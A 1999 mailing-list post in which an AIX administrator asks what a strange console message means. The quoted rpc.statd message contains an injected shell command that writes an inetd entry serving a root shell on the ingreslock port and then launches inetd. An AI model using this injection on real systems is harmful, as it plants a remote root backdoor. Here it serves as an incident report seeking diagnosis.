List:       aix-l
Subject:    clnttcp_create message
From:       Diane Hudson <DIANE.HUDSON () EMAIL ! SWMED ! EDU>
Date:       1999-03-31 17:39:02

The following message appeared on the system console last night. Can anyone tell me \
what it means?

clnttcp_create:  RPC:  Program not registered
rpc.statd:  cannot contact local lockd on ; echo "ingreslock stream tcp nowait root \
/bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob & status change, give up!

The message was repeated three times.

I'd surely appreciate any info you can provide.

Thanks,
Diane

Diane J. Hudson, Systems Librarian
UT Southwestern Medical Center Library